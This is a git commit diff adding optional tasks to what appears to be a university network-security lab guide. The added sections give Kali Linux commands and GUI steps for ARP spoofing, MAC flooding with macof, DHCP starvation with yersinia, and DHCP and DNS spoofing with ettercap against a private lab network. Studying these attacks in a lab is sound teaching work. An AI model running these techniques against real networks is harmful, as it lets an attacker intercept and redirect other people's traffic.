Add final optional tasks

This commit is contained in:
Alex Tsaparas 2023-10-26 15:39:09 +02:00
parent 193389b229
commit eff853da28

View file

@ -57,6 +57,8 @@ disable
```sh ```sh
sudo -i sudo -i
ifconfig eth0 192.168.1.1X netmask 255.255.255.0 ifconfig eth0 192.168.1.1X netmask 255.255.255.0
route add default gw 192.168.1.1
echo "nameserver 208.67.222.222" > /etc/resolv.conf
# watch the result using the command below # watch the result using the command below
ip addr show ip addr show
``` ```
@ -69,3 +71,60 @@ sudo arpspoof -i eth0 -t 192.168.1.11 192.168.1.1
# Spy traffic from router to victim # Spy traffic from router to victim
sudo arpspoof -i eth0 -t 192.168.1.1 192.168.1.11 sudo arpspoof -i eth0 -t 192.168.1.1 192.168.1.11
``` ```
## MAC Flooding
### Switch Configuration
```sh
enable
clear mac address-table dynamic
```
### Kali Linux
```sh
ping 192.168.1.1
# after the ping we should have 2 Mac addresses in the table
macof
# after the macof we have overflow of mac addresses
```
## DHCP Spoofing
```sh
sudo -i
apt install yersinia
```
### Perform DHCP Starvation
- Start yersinia-graphical
- Select `Launch Attack`
- Select `DHCP`
- Select sending `DISCOVER packet`
- Select `Ok`
- Open ettercap-graphical
- Go to MITM menu
- Select `DHCP Spoofing`
- Set configurations
- IP Pool: 192.168.1.10-192.168.1.20
- Netmask: 255.255.255.0
-
### Disable DHCP
Because DHCP doesn't work on the victim machine, we need to disable it.
```sh
enable
configure terminal
no service dhcp
```
### On victim machine
```sh
ifconfig eth0 0.0.0.0
dhclient -r
dhclient eth0
```
## DNS Spoofing
- Go to ettercap-graphical
- Start a DHCP Spoofing
- Select configuration as victim (192.168.1.0 255.255.255.0 1.1.1.1)
- Go to Plugins
- Activate `dns_spoof`